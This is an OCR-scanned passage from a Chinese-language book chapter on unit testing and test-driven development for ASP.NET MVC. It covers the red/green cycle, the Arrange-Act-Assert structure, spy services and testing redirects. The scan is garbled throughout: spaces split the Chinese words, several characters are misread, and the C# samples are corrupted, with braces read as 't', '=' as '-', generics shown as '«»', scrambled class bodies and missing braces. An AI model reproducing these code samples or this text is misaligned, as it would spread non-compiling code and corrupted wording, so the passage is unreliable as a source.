独 一 个 很 容易 测试 的 行为 。 这 种 确保 我 们 拥有 小 巧 、 集 中 、 行 为 单一 的 类 的 做 法 叫做 单一 职 
责 模式 (Single Responsibility Pattern, SRP). 


4. 自动 结果 


如 果 对 每 一 小 段 代 码 编写 测试 程序 ， 显 而 易 见 ， 最 终 我 们 将 会 编写 很 多 单元 测试 。 为 了 
充分 发 挥 单元 测试 的 效用 ， 我 们 将 在 应 用 程序 开发 的 过 程 中 频繁 地 运行 测试 程序 以 确保 新 编 
写 的 代码 不 影响 已 有 的 功能 。 如 果 测试 过 程 不 是 自动 的 , 这 将 会 损耗 开发 人 员 的 大 部 分 精力 ， 
其 至 变 成 开发 人 员 极 力 回 避 的 过 程 。 另 一 个 重要 方面 是 ， 单 元 测试 的 结果 是 简单 的 pass/fail 
判断 ， 单 元 测试 结果 不 应 该 存在 多 种 解释 。 

为 了 获得 自动 过 程 ， 开 发 人 员 通 常 使 用 单元 测试 框架 。 该 框架 允许 开发 人 员 使 用 自己 最 
擅长 的 编程 语言 和 开发 环境 编写 测试 程序 ， 然 后 创建 pass/fail 规 则 集 ， 框架 可 以 根据 创建 的 这 
些 规则 判定 测试 是 否 成 功 。 单 元 测试 框架 中 通常 有 一 个 称 为 运行 程序 eunneD 的 小 软件 ， 可 用 
来 在 项 目 中 查找 和 执行 单元 测试 。 系 统 中 存在 很 多 这 样 的 软件 ， 一 些 集成 到 了 Visual Studio 
中 ， 一 些 要 从 命令 行 运行 ， 而 其 他 一 些 集成 到 了 GUI 中 ， 甚 至 还 有 一 些 集成 到 了 自动 创建 工 
具 中 ， 像 脚本 创建 工具 和 自动 创建 服务 器 工具 等 。 


5. 单元 测试 一 一 软件 质量 的 保证 


许多 开发 人 员 之 所 以 选择 编写 单元 测试 ， 是 因为 单元 测试 可 以 提高 他 们 开发 软件 的 质 
量 。 在 这 种 情形 下 ， 单 元 测试 主要 作为 软件 质量 保障 机 制 来 保证 开发 软件 的 质量 ， 因 此 ， 通 
常情 况 下 ， 开 发 人 员 首 先 编写 产品 代码 ， 而 后 编写 单元 测试 。 开 发 人 员 根 据 产品 代码 和 预期 
的 最 终 用 户 行为 来 创建 测试 列表 ， 以 确保 产品 代码 按 计划 执行 。 

但 是 , 在 产品 代码 之 后 编写 测试 程序 存在 一 些 弱点 。 开 发 人 员 很 容易 遗漏 一 些 产品 代码 ， 
特别 是 在 编写 了 产品 代码 之 后 很 长 一 段 时 间 再 编写 单元 测试 时 。 开 发 人 员 在 单元 测试 的 最 后 
部 分 花费 数 天 或 数 周 时 间 编 写 产品 代码 的 情况 也 是 常见 的 ， 并 且 还 需要 一 个 非常 认真 的 人 来 
保证 产品 代码 的 每 一 个 执行 路 径 都 有 合适 的 单元 测试 进行 测试 。 糟 糕 的 是 ， 经 过 数 周 编码 之 
后 ， 开 发 人 员 想 编写 过 多 的 产品 代码 ， 而 不 停 下 来 编写 单元 测试 。 而 测试 驱动 开发 可 以 有 效 
地 弥补 这 些 不 足 。 


14.1.2 ”测试 驱动 开发 的 定义 


测试 驱动 开发 指 的 是 利用 单元 测试 驱动 产品 代码 设计 的 过 程 ， 首 先 编写 单元 测试 ， 然 后 
编写 足够 的 产品 代码 使 其 通过 测试 。 从 表面 上 看 ， 这 与 传统 单元 测试 的 最 终结 果 是 一 样 的 
产品 代码 以 及 用 来 描述 产品 代码 行为 的 单元 测试 ， 一 起 用 来 阻止 行为 回归 。 如 果 两 者 得 到 正 
确 执 行 ， 那 么 通过 查看 单元 测试 ， 我 们 看 不 出 来 是 先 编写 的 单元 测试 ， 还 是 先 编写 的 产品 
代码 。 

当 我 们 说 把 单元 测试 作为 质量 保障 机 制 时 ， 主 要 指 的 是 减少 软件 中 的 漏洞 。TDD 可 以 实 
现 这 一 目标 ,但 这 并 不 是 它 的 主要 目标 ; TDD 的 主要 目标 是 提高 软件 设计 的 质量 。 通 过 首先 
编写 单元 测试 ， 我 们 可 以 在 编写 任何 产品 代码 之 前 描述 想 要 组 件 执行 的 操作 。 由 于 还 没有 产 
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品 代码 的 详细 实现 ， 因 此 ， 我 们 不 会 将 精力 放 到 产品 代码 的 任何 具体 实现 上 。 单 元 测试 并 不 
是 要 偷窥 产品 代码 的 内 部 结构 ， 而 是 变 成 产品 代码 的 消费 者 ， 以 便 与 协作 组 件 几乎 一 样 的 方 
式 来 使 用 它 。 这 些 测试 通过 变 成 API 的 第 一 批 用 户 来 修正 组 件 的 API。 


1. 红 / 绿 周期 


我 们 仍 遵循 前 面 为 单元 测试 设置 的 指导 原则 : 编写 小 段 代 码 、 隔 离 测 试 和 自动 执行 测试 。 
由 于 首先 编写 测试 程序 ， 因 此 当 使 用 TDD 时 ， 我 们 经 常会 进入 一 个 周期 步骤 ， 

(1) 编写 一 个 单元 测试 。 

(2) 运行 单元 测试 ， 得 到 fail 结 果 ( 因 为 尚未 编写 测试 代码 )。 

(3) 编写 足够 的 产品 代码 ， 通 过 单元 测试 。 

(4) 重新 运行 单元 测试 程序 ， 得 到 pass 结 果 。 

重复 以 上 步骤 ， 直 到 产品 代码 编写 完毕 为 止 。 由 于 大 部 分 的 单元 测试 框架 用 红色 的 文本 
/UI 元 素 表 示 失 败 的 测试 ， 用 绿色 的 文本 /UI 元 素 表示 通过 的 测试 ， 因 此 ， 这 个 周期 称 为 红 / 绿 
周期 (red/green cycle)。 在 这 个 过 程 中 勤奋 是 很 重要 的 。 除 非 某 个 单元 测试 失败 ， 否 则 就 不 要 
编写 任何 新 的 产品 代码 。 请 记 住 ,测试 一 旦 通过 ,我们 就 不 要 再 编写 新 的 产品 代码 (除非 有 一 
个 新 的 单元 测试 失败 )。 当 按 正 常 执行 时 ， 这 就 会 告知 我 们 何 时 停止 编写 新 的 产品 代码 。 编 写 
足够 的 产品 代码 通过 测试 ， 然 后 停止 编写 代码 ; 如果 想 继续 编写 ， 就 需要 在 另 一 个 测试 中 描 
述 想 要 实现 的 新 行为 。 这 不 仅 给 我 们 提供 了 后 来 的 没有 描述 功能 的 故障 质量 益处 ， 也 给 了 我 
们 一 定时 间 去 考虑 是 否 真 的 需要 新 功能 ， 并 愿意 长 期 支持 该 新 功能 。 

当 修 复 故障 时 ， 我 们 也 使 用 同样 的 步 又 方法 。 我 们 可 能 需要 通过 反复 调试 代码 来 发 现 故 
障 的 性 质 , 但 一 旦 知道 了 故障 的 性 质 , 就 可 以 编写 描述 期 望 行为 的 单元 测试 , 运行 测试 程序 ， 
失败 ， 然 后 修改 产品 代码 以 更 正 错误 。 我 们 可 以 利用 已 有 的 单元 测试 ， 来 帮助 确保 所 做 的 修 
改 没 有 破坏 任何 已 有 的 期 望 功能 。 


2. 重 构 


按照 这 里 描述 的 模式 ， 代 码 的 细微 改变 可 能 就 会 导致 代码 的 大 片 修改 ， 从 而 使 代码 凌乱 
不 堪 。 当 测试 通过 的 时 候 ， 我 们 就 应 该 停止 编写 产品 代码 ， 那 么 此 时 如 何 消 除 代 码 的 细微 修 
改 所 带 来 的 代码 混乱 呢 ? 答案 是 重 构 。 

“ 重 构 ” 一 词 具有 多 种 意义 ， 但 这 里 的 重 构 是 指 在 不 改变 产品 代码 外 部 可 见 功能 的 情况 
下 ， 修 改 产品 代码 实现 细节 的 过 程 。 这 也 是 当 通 过 所 有 的 单元 测试 时 ， 我 们 在 实际 应 用 中 所 
采用 的 过 程 。 在 重 构 和 更 新 产品 代码 的 过 程 中 ， 单 元 测试 应 该 能 够 继续 通过 。 在 重 构 时 不 要 
修改 任何 单元 测试 程序 ， 如果 要 求 必须 修改 单元 测试 ， 我 们 则 要 按照 “ 红 / 绿 周期 ”一 节 讲 解 
的 编写 单元 测试 程序 的 步 又 来 添加 、 删 除 或 改变 功能 。 切 勿 同时 修改 测试 程序 和 产品 代码 。 
因此 更 确切 地 说 ， 重 构 是 一 种 机 制 ， 也 可 以 说 是 在 不 破坏 单元 测试 程序 的 情况 下 ， 构 建 结构 
化 代码 的 过 程 。 


3. 采用 Arrange、Act、Assert 结构 化 测试 


本 书 中 单元 测试 的 许多 例子 都 遵照 一 个 称 为 “Arrange、Act、Assert” 的 结构 (有 时 缩写 
为 3A)， 该 结构 由 William C. Wake 在 他 的 一 篇 博文 (http://weblogs.java.net/blog/wwake/archive/ 
2003/12/tools_especiall.html) 上 提出 ， 描 述 了 一 种 由 三 部 分 组 成 的 单元 测试 结构 : 
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e Arrange: 准备 测试 环境 。 

e Act 在 测试 中 调用 的 方法 。 

e Assert: 确保 按 预期 执行 。 

采用 3A 结 构 编写 的 单元 测试 的 代码 如 下 所 示 : 
[TestMethod] 


public void PoppingReturnsLastPushedItemFromStack() 
t 


// Arrange 
var stack = new Stack«string»(); 
var value - "Hello, World!"; 


stack.Push (value); 


// Act 
string result = stack.Pop(); 


// Assert 
Assert.AreEqual(value, result); 
} 


为 了 清楚 地 显示 测试 程序 的 结构 , 上 面 的 代码 中 添加 了 Arrange、Act 和 Assert 注 释 。 首 先 ， 
arrange 部 分 创建 了 一 个 空 栈 ， 并 推进 一 个 值 。 这 些 是 测试 功能 时 的 先决 条 件 。 然 后 ，act 部 分 
从 栈 中 弹出 arange 部 分 添加 的 值 ， 这 里 只 测试 一 行 代码 。 最 后 ，assert 部 分 测试 一 个 合乎 逻辑 
的 行为 ， 从 栈 中 弹出 的 值 和 推进 栈 中 的 值 是 一 样 的 。 如 果 要 精简 测试 代码 ， 我 们 可 以 去 掉 注 
释 ， 而 改 用 若干 空白 行 来 分 隔 各 部 分 代码 。 


4. 单一 断言 规则 


在 上 面 3A 形 式 栈 的 示例 中 ， 确 保 栈 得 到 期 望 值 的 assert 部 分 只 有 一 行 代码 ， 难 道 没有 许 
多 其 他 可 以 断言 的 行为 吗 ? 例如 ， 一 旦 从 栈 中 弹出 推进 的 值 ， 栈 就 变 空 ， 难 道 我 们 不 应 该 确 
保 它 是 空 的 吗 ? 如 果 此 时 再 尝试 弹出 另 一 个 值 ， 程 序 就 会 抛 出 异常 ;难道 我 们 不 也 应 该 编写 
程序 测试 吗 ? 

在 一 个 测试 中 ， 一 定 不 要 同时 测试 多 个 行为 。 一 个 好 的 单元 测试 程序 通常 只 测试 一 个 非 
常 小 的 功能 ， 即 一 个 单一 行为 。 这 里 测试 的 不 是 “一 个 最 近 空 栈 的 所 有 属性 ”， 而 是 从 一 个 非 
空 栈 中 弹出 的 已 知行 为 。 要 测试 空 栈 的 其 他 属性 ， 我 们 应 该 编写 更 多 单元 测试 ， 即 要 验证 的 
每 一 个 小 行为 都 对 应 一 个 单元 测试 。 

保持 测试 程序 精简 和 单一 集中 意味 着 当 修 改 产品 代码 时 我 们 只 需要 修改 很 少 的 (很 可 能 
是 一 个 ) 测 试 程序 。 这 样 反 过 来 也 使 得 破坏 的 内 容 以 及 修正 的 方法 更 容易 理解 。 如 果 把 若干 个 
行为 混 到 一 个 单元 测试 (或 者 跨 多 个 单元 测试 ) 中 ， 一 个 单一 行为 的 破坏 可 能 会 导致 数 十 个 测 
试 程序 的 失败 ， 我 们 将 不 得 不 在 每 个 测试 程序 中 过 滤 这 几 个 行为 以 确定 出 现 故 障 的 行为 。 

一 些 开 发 人 员 将 这 一 规则 称 为 单一 断言 规则 (single assertion rule)。 不 要 误 以 为 我 们 的 测 
试 程序 只 能 调用 一 次 Assert， 其 实 ， 我 们 只 要 记得 一 次 只 测试 一 个 行为 ， 而 验证 一 个 合乎 逻 
辑 的 行为 调用 多 次 Assert 经 常 是 有 必要 的 。 
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14.2 创建 单元 测试 项 目 


MS Test 单 元 测试 框架 包含 在 Visual Studio 2013 
的 所 有 版 本 中 (包括 免费 版 本 )， 其 包含 的 单元 测试 
运行 程序 比 原来 改进 了 许多 。 尽 管 可 以 在 Visual 
Studio 中 直接 创建 单元 测试 项 目 ， 但 是 开始 对 
ASPNET MVC 应 用 程序 进行 单元 测试 需要 做 大 量 
繁琐 的 工作 。 因 此 ，ASPNET MVC 团 队 在 New 
Project 对 话 框 中 为 ASPNET MVC 应 用 程序 包含 了 
单元 测试 功能 ， 如 图 14-1 所 示 。 

选择 Add Unit Tests 复 选 框 ，ASPNET MVC 
New Project Wizard 就 会 创建 一 个 相关 的 单元 测试 
项 目 ， 同 时 还 会 用 一 套 默认 的 单元 测试 来 填充 新 创 
建 的 项 目 。 这 些 默 认 的 单元 测试 可 以 帮助 新 用 户 理 
解 如 何 编写 ASPNET MVC 应 用 程序 的 测试 程序 。 


14.2.1 检查 默认 单元 测试 


c 5 EE 五 
Eme . mv 
e Si 

Sederes fee 

es 


Add folders and core references for. 
web Foms TMvc E] WebAPL 


Testproject name: — ProfessionalMVCS Tests. 


图 14-1 


默认 的 应 用 程序 模板 为 我 们 提供 了 足够 的 功能 来 开始 第 一 个 应 用 程序 。 当 创建 新 项 目 
时 ， 系 统 会 自动 打开 HomeController.cs 文 件 。HomeController.cs 文 件 中 包含 三 个 操作 方法 : 
Index、About 和 Contact。 下 面 是 Index 操 作 方 法 的 源 代码 : 


public ActionResult Index() 


t 
return View(); 


) 
这 是 非常 简单 的 MVC 代 码 ， 只 是 返回 一 个 视图 结果 。 对 应 的 单元 测试 也 非常 简单 。 在 
默认 的 单元 测试 项 目 中 ，Index 操 作 方法 只 有 一 个 测试 程序 : 


[TestMethod] 
public void Index() 


t 
// Arrange 


HomeController controller - new HomeController(); 


// Act 


ViewResult result - controller.Index() as ViewResult; 


// Assert 
Assert.IsNotNull (result); 
} 


上 面 是 一 个 非常 好 的 单元 测试 : 按照 3A 形 式 编写 ， 由 3 行 代码 组 成 ， 并 且 非 常 容易 理解 。 


然而 ， 尽 管 这 样 ， 该 单元 测试 程序 仍然 有 待 完善 。 


虽然 Index 操作 方法 只 有 一 行 源 代 码 ， 却 要 
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完成 两 项 任务 : 

e 返回 一 个 视图 结果 。 

e. 返回 的 视图 结果 使 用 默认 视图 。 

该 单元 测试 实际 上 是 在 测试 这 两 个 问题 中 的 一 个 问题 。 我 们 可 能 会 争辩 说 ， 至 少 需要 再 
添加 一 个 assert 语 句 来 确保 视图 名 称 为 空 ， 如 果 打 算 再 编写 一 个 单独 的 单元 测试 ， 笔 者 不 认为 
是 错误 的 。 

注意 到 测试 程序 中 使 用 as 关键 字 将 结果 转换 成 ViewResult 类 型 了 吗 ? 转换 是 一 个 令 人 感 
兴趣 的 代码 味道 (code smell)， 也 就 是 说 我 们 觉得 代码 中 在 某 个 地 方 存在 错误 的 暗示 。 转 换 真 
是 必需 的 吗 ? 显而易见 ， 单 元 测试 程序 需要 ViewResult 类 的 一 个 实例 才能 访问 ViewBag 属 性 ; 
这 部 分 没 问题 。 但 是 我 们 可 以 对 操作 方法 的 代码 做 细微 改动 ， 而 使 转换 成 为 不 必要 的 吗 ? 答 
案 是 可 以 的 ， 而 且 我 们 应 该 按 下 面 这 样 操作 : 

public ViewResult Index() 

t 


return View(); 
) 


通过 把 操作 方法 的 返回 值 由 一 般 的 ActionResult 类 型 修改 为 具体 的 ViewResult 类 型 ， 我 们 

可 以 清楚 地 表达 代码 的 功能 : Index 操 作 方 法 总 是 返回 一 个 视图 。 现 在 只 对 产品 代码 做 了 一 点 
简单 的 修改 ， 我 们 就 由 测试 的 4 个 问题 减少 为 3 个 问题 。 如 果 Index 操 作 方法 还 需要 返回 除 
ViewResult 之 外 的 其 他 对 象 (例如 ， 有 时 需要 返回 一 个 视图 ， 有 时 需要 进行 重 定向 )， 那 么 我 们 
还 是 不 得 不 采用 ActionResult 作 为 返回 类 型 。 如 果真 是 这 样 ， 显 然 ， 我 们 还 必须 测试 实际 的 返 
类 型 ， 因 为 返回 类 型 未 必 总 是 一 样 的 。 

接 下 来 重 写 前 面 的 测试 程序 来 验证 这 两 种 行为 : 

[TestMethod] 

public void IndexShouldAskForDefaultView() 


t 
var controller = new HomeController(); 


IE 


ViewResult result = controller.Index(); 


Assert.IsNotNull (result); 
Assert.IsNull(result.ViewName); 
} 


测试 程序 修改 后 ， 看 起 来 好 多 了 。 虽 然 测试 程序 依然 简单 ， 但 它 却 消除 了 影响 原始 测试 程 
序 的 微妙 错误 。 还 有 一 点 值得 注意 的 是 ， 我 们 也 给 了 测试 程序 更 加 详细 、 描 述 性 更 强 的 名 称 ， 
可 以 用 来 在 不 查看 测试 程序 的 内 部 代码 的 情况 下 ， 帮 助 我 们 理解 测试 失败 的 原因 。 我 们 可 能 
不 知道 名 为 Index 的 测试 程序 为 什么 会 失败 ， 但 是 我 们 一 定 清 楚 地 了 解 
IndexShouldAskForDefaultView 测 试 失败 的 原因 。 


14.2.2 ”只 测试 自己 编写 的 代码 


单元 测试 和 TDD 的 初学 者 很 容易 犯 的 一 个 错误 是 ， 他 们 经 常 有 意 无 意 地 测试 不 是 由 自己 
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编写 的 代码 。 实 际 上 ， 我 们 的 测试 应 该 集中 在 自己 编写 的 代码 上 ， 而 不 是 它们 所 依赖 的 代码 
或 逻辑 上 。 

作为 一 个 具体 的 例子 ， 请 看 上 一 节 的 测试 : 

[TestMethod] 

public void IndexShouldAskForDefaultView() 


x 
var controller - new HomeController(); 


ViewResult result = controller.Index(); 


Assert.IsNotNull (result); 
Assert.IsNull (result.ViewName); 
) 


当 调 用 一 个 控制 器 操作 ， 并 通过 MVC 管 道 泻 染 一 个 视图 时 ， 会 发 生 一 系列 事件 ，MVC 
定位 操作 方法 ， 然 后 ， 调 用 模型 绑 定 器 为 每 个 操作 方法 参数 绑 定 值 来 调用 这 些 操作 方法 ， 从 
操作 方法 中 取出 值 并 执行 ， 最 后 把 输出 结果 发 送 回 浏览 器 。 另 外 ， 由 于 我 们 请 求 的 是 默认 视 
图 ， 因 此 ， 系 统 尝试 在 文件 夹 ~/Views/Home 和 ~/Views/Shared 文 件 夹 中 查找 一 个 名 为 Index 的 
视图 (以 匹配 操作 名 称 )。 
这 个 单元 测试 不 涉及 任何 代码 。 单元 测试 应 该 只 测试 要 测试 的 代码 , 而 不 是 它 的 合作 者 。 
一 次 测试 多 个 问题 的 测试 称 为 集成 测试 (integration test)。 如 果 仔 细 想 一 下 ， 会 发 现 不 存在 这 
样 的 测试 , 因为 这 样 的 测试 行为 的 所 有 其 余部 分 由 ASPNET MVC 框 架 本 身 提供 , 而 不 是 由 我 
们 编写 代码 实现 。 从 单元 测试 的 角度 来 说 ,我 们 必须 相信 : ASPNET MVC 框 架 能 够 做 所 有 这 
些 事情 。 测 试 一 起 运行 的 所 有 代码 也 是 一 个 宝贵 的 锻炼 ， 但 它 超出 了 单元 测试 的 范围 。 

现在 重点 讨论 一 下 ViewResult 类 。 它 是 调用 Index 操 作 的 直接 结果 。 我 们 要 测试 系统 默认 
查找 Index 视 图 的 能 力 吗 ? 我 们 可 以 说 不 ， 因 为 这 不 是 我 们 自己 编写 代码 来 实现 ， 而 是 由 
ASPNET MVC 框 架 提供 , 但 是 其 实 连 这 样 的 理由 都 用 不 到 。 我 们 可 以 说 不 ,尽管 它 是 自己 定 
义 的 操作 结果 类 ,但 它 不 是 我 们 当前 要 测试 的 代码 。 目 前 , 我 们 关注 Index 操 作 。 其 实 ，Index 
操作 采用 了 一 个 具体 操作 结果 类 型 才 是 我 们 所 需要 知道 的 ， 具 体 它 做 的 什么 是 该 段 代码 的 单 
元 测试 所 关注 的 问题 。 事 实 上 ， 可 以 认为 ， 操 作 结果 无 论 是 由 我 们 自 定义 的 还 是 由 ASPNET 
团队 提供 的 ， 操 作 结 果 代码 就 其 本 身 而 言 都 能 得 到 充分 的 测试 。 


14.3 ”单元 测试 用 于 ASP.NET MVC 和 ASP.NET Web API 
应 用 程序 的 技巧 和 穿 门 


现在 我 们 学 习 了 必要 工具 , 接 下 来 详细 介绍 ASPNET MVC 应 用 程序 中 常见 的 一 些 单元 测 
试 任务 。 


14.3.1 控制 器 测试 


默认 的 单元 测试 项 目 包含 一 些 控制 器 测试 程序 ， 这 些 默 认 的 测试 程序 在 本 章 前 面 已 修改 
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完善 。 控 制 器 测试 中 存在 有 数量 惊人 的 微妙 差异 ， 这 些 差异 通常 位 于 体面 代码 和 优质 代码 之 
间 的 细小 不 同 处 。 


1. 控制 器 中 不 要 包含 业务 逻辑 


在 模型 -视图 -控制 器 结构 中 ， 控 制 器 主要 承担 着 模型 (包含 业务 逻辑 ) 和 视图 (包含 用 户 界 

) 之 间 的 协调 者 角色 , 是 把 每 个 部 分 连接 到 一 块 儿 , 并 使 其 运行 的 调度 程序 。 不 过 严格 来 说 ， 
Web API 没 有 视图 。 我 们 可 以 把 使 用 请 求 的 格式 CXML、JSON 等 ) 泻 染 模型 对 象 看 成 视图 的 一 
种 形式 。 下 面 讨论 MVC 控 制 器 的 最 佳 特性 时 ， 大 部 分 建议 也 适用 于 Web API 控 制 器 。 

当 谈论 业务 逻辑 时 ， 它 可 以 和 数据 或 输入 验证 一 样 简单 ,也 可 以 和 申请 长 期 运行 进程 ( 比 
如 核心 业务 工作 流 ) 一 样 复杂 。 作 为 一 个 示例 ， 控 制 器 不 应 该 试图 验证 模型 是 正确 的 ， 因 为 这 
是 业务 模型 层 的 任务 。 然 而 ， 当 被 告知 模型 无 效 时 ,控制 器 需要 关注 采取 什么 样 的 操作 (可 能 
当 模型 无 效 时 , 需要 重新 显示 一 个 特定 视图 , 或 当 模型 有 效 时 , 用 户 将 被 发 送 到 另 一 个 页 面 )。 
当 我 们 遇 到 无 效 数据 时 ，Web API 控 制 器 也 有 定义 良好 的 行为 : HTTP 400(*Bad Request”) 响 应 
代码 。 

因为 控制 器 操作 方法 比较 简单 ， 所 以 相应 地 ， 操 作 方法 的 单元 测试 也 应 该 简单 。 单 元 测 
试 也 应 该 和 控制 嚣 一样， 把 业务 逻辑 和 单元 测试 逻辑 分 开 。 

为 了 更 加 详细 地 说 明 这 条 忠告 ， 下 面 考虑 模型 和 验证 。 一 个 好 单元 测试 和 坏 的 单元 测试 
之 间 的 差异 是 十 分 微妙 的 。 一 个 好 的 单元 测试 会 提供 一 个 假 的 业务 逻辑 层 ， 用 来 根据 测试 需 
要 来 告知 控制 器 模型 是 否 有 效 ， 而 一 个 坏 的 单元 测试 会 把 好 的 数据 或 坏 的 数据 胡乱 拼凑 到 一 
H, 由 现 有 的 业务 逻辑 层 为 控制 器 辨别 数据 的 好 坏 。 坏 的 单元 测试 一 次 测试 两 个 组 件 (控制 器 
操作 和 业务 层 )。 使 用 坏 的 单元 测试 的 一 个 不 太 明显 的 问题 是 它 使 用 了 坏 的 数据 ， 如 果 随 着 时 
间 的 推移 ， 坏 数据 的 定义 发 生 了 改变 ， 那 么 测试 也 会 变 得 不 正常 ， 当 运行 测试 时 ， 可 能 会 导 
致 假 的 错误 结果 (或 更 糟 的 是 ， 假 的 正确 结果 )。 

想 要 编写 良好 的 单元 测试 还 要 求 控制 器 设计 中 的 一 些 准 则 ,这 也 是 提出 下 面 第 二 条 忠告 
的 直接 原因 。 


2. 通过 构造 函数 传递 服务 依赖 


为 了 编写 刚才 讨论 的 好 单元 测试 ， 我 们 需要 提供 一 个 假 的 业务 逻辑 层 。 如 果 控 制 器 直接 
绑 定 到 业务 层 ， 这 将 会 是 相当 大 的 挑战 。 而 如 果 通 过 构造 函数 把 业务 层 看 成 一 个 服务 参数 ， 
这 样 就 会 使 我 们 提供 假 业 务 层 变 得 很 简单 。 

这 里 正 是 第 13 章 忠告 的 用 武之 地 。ASPNETMVC 和 Web API 引 入 了 一 些 简 单方 法 来 实现 
应 用 程序 中 的 依赖 注入 ， 从 而 使 得 通过 构造 函数 参数 获得 服务 的 理念 成 为 可 能 ， 可 喜 的 是 这 
一 过 程 非常 简单 。 通 过 第 三 方 提供 的 NuGet 库 ， 这 两 个 框架 能 够 支持 几乎 所 有 的 依赖 注入 框 
架 。 我 们 现在 可 以 在 单元 测试 中 轻松 地 利用 这 些 成 果 来 帮助 实现 隔离 测试 (单元 测试 的 三 个 关 
键 方面 之 一 )。 

为 了 测试 这 些 服务 依赖 ， 要 求 服务 是 可 替换 的 。 也 就 是 说 ， 我 们 需要 用 接口 或 抽象 基 类 
来 表示 服务 。 为 单元 测试 编写 的 假 替 代 层 可 以 手动 编写 代码 实现 ， 或 者 使 用 模拟 框架 来 简化 
实现 。 甚 至 可 使 用 称 为 自动 模拟 容器 (auto-mocking containers) 的 特殊 种 类 的 依赖 注入 容器 来 
帮助 自动 创建 。 

手动 编写 假 服务 的 一 个 常见 方法 是 间谍 (spy)， 它 只 是 记录 传递 的 值 ， 以 便 单元 测试 后 期 
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检查 。 例 如 ， 假 如 我 们 有 一 个 Math 服 务 (一 个 简单 例子 )， 带 有 如 下 接口 : 


public interface IMathService 


t 


int Add(int left, int right); 


} 


上 述 代 码 中 使 用 的 方法 的 参数 需要 两 个 值 ， 返 回 一 个 值 。 显 而 易 见 ，Math 服 务 的 真实 实 
现 是 求 两 个 值 的 和 。 间 谍 实 现 可 能 如 下 : 


public class SpyMathService : IMathService 


{ 
public 
public 
public 


public 
{ 
Add 


int Add Left; 

int Add Right; 

int Add Result; 

int Add(int left, int right) 


Left - left; 


Add Right - right; 
return Add Result; 


} 
} 


现在 单元 测试 可 以 创建 该 间谍 的 一 个 实例 ， 当 调用 Add 时 ， 用 传 回来 的 值 设 置 Add_Result, 
在 测试 完毕 后 ,可 断言 Add_Left 和 Add_Right 的 值 以 确保 进行 了 正确 交互 。 注 意 间谍 在 这 里 没 
有 对 两 个 值 求 和 ， 因 为 我 们 只 关注 进出 数学 服务 的 值 : 

[TestMethod] 

public void ControllerUsesMathService() 


t 


var service = new SpyMathService ( Add Result = 42; } 
var controller - new AdditionController (service); 


var result - controller.Calculate(4, 12); 


Assert.AreEqual(service.Add Result, result.ViewBag.TotalCount); 
Assert.AreEqual(4, service.Add Left); 
Assert.AreEqual(12, service.Add Right); 


} 


3. 对 HttpContext 操纵 采用 操作 结果 


ASPNET 核 心 基础 结构 主要 由 IHttpModule 和 IHttpHandler 接 口 ， 以 及 HttpRequest 和 
HttpResponse 等 类 的 HttpContext 层 次 结构 组 成 。 这 些 也 是 所 有 ASPNET 构 建 的 基础 类 , 无 论 是 
Web Forms、MVC 还 是 Web Pages 都 是 在 其 上 构建 。 

但 是 ， 从 测试 角度 来 看 ， 这 些 类 并 不 友好 。 由 于 没有 办 法 蔡 换 其 功能 ， 因 此 使 得 测试 与 它 
们 之 间 的 任何 交互 都 非常 困难 (尽管 不 是 不 可 能 )。.NET 3.5 SP1 中 引入 了 一 个 称 为 
System.Web.Abstractions.dl 的 程序 集 ， 其 中 创建 了 这 些 类 的 抽象 版 本 (HttpContextBase 是 
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HttpContext 的 抽象 版 本 )。ASPNET MVC 中 的 所 有 程序 都 是 用 这 些 抽象 类 而 不 是 通过 它们 原 
始 的 对 应 类 编写 的 ， 从 而 使 得 与 这 些 类 的 交互 代码 的 测试 变 得 简单 。 
但 是 即便 这 样 也 不 完美 。 这 些 类 仍 有 非常 深 的 层次 结构 ， 而 且 其 中 的 大 多 数 类 还 有 数 十 
个 属性 和 方法 。 这 些 类 提供 的 间谍 版 本 非常 乏味 而 且 易 于 出 错 ， 因 此 ， 大 部 分 开发 人 员 采 用 
模拟 框架 来 简化 这 项 工作 。 即 便 如 此 ， 重 复 地 设置 模拟 框架 仍然 单调 乏味 。 因 为 控制 器 测试 
量 非常 大 ， 所 以 我 们 应 该 尽量 减少 编写 测试 所 带 来 的 痛苦 。 

考虑 ASPNET MVC 中 的 RedirectResult 类 ， 它 的 实现 非常 简单 ， 只 是 调用 了 方法 
HttpContextBase.Response.Redirect。 为 什么 开发 团队 费 尽 心思 地 创建 这 个 类 呢 ? 当 我 们 把 一 
行 代码 换 成 另 一 行 更 简单 的 代码 时 ， 答 案 就 浮 出 水 面 了 : 使 单元 测试 更 加 容易 。 

为 了 清楚 地 说 明 问 题 ， 下 面 编 写 一 个 假想 的 操作 方法 ， 用 来 重 定向 到 网 站 的 另 一 部 分 : 

public void SendMeSomewhereElse() 

ii 


Response.Redirect ("-/Some/Other/Place"); 
) 


上 面 的 操作 方法 非常 容易 理解 ， 但 它 的 测试 程序 没有 我 们 想象 的 简单 。 使 用 Moq 模 拟 框 
架 编 写 的 单元 测试 如 下 : 


[TestMethod] 

public void SendMeSomewhereElseIssuesRedirect () 

t 
var mockContext - new Mock«ControllerContext»(); 
mockContext.Setup(c => 

c.HttpContext.Response.Redirect ("-/Some/Other/Place")); 

var controller - new HomeController(); 
controller.ControllerContext = mockContext.Object; 


controller.SendMeSomewhereElse(); 


mockContext.Verify(); 


注意 ”Moq 模 拟 框架 可 作为 一 个 NuGet 包 获取 ， 也 可 从 GitHub 网 站 下 载 : 
https://github.com/Moq/moq4. 


这 是 一 些 丑 陋 的 代码 ， 即 便 知 道 如 何 编写 也 是 如 此 ! 重 定向 几乎 是 我 们 所 能 做 的 最 简单 
的 事情 。 如 果 每 次 为 操作 编写 测试 程序 时 都 不 得 不 编写 这 样 的 代码 , 将 是 非常 痛苦 的 一 件 事 。 
因为 必要 的 间谍 类 的 源 程序 清单 会 占据 好 几 页 ， 所 以 从 测试 角度 来 看 ，Moq 非 常 接近 理想 情 
况 。 然 而 ， 尽 管 小 的 改变 对 控制 器 的 可 读 性 没有 多 大 影响 ， 但 却 可 以 大 大 提高 单元 测试 程序 
的 可 读 性 ， 如 下 所 示 : 


public RedirectResult SendMeSomewhereElse() 
{ 

return Redirect ("-/Some/Other/Place"); 
} 
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[TestMethod] 
public void SendMeSomewhereElseIssuesRedirect() 
t 

var controller = new HomeController(); 


var result = controller.SendMeSomewhereElse(); 


Assert.AreEqual("-/Some/Other/Place", result.Url); 
H 


当 使 用 HttpContext 和 友 元 把 交互 内 容 封装 到 操作 结果 中 时 ， 我 们 就 把 测试 的 负担 转移 到 
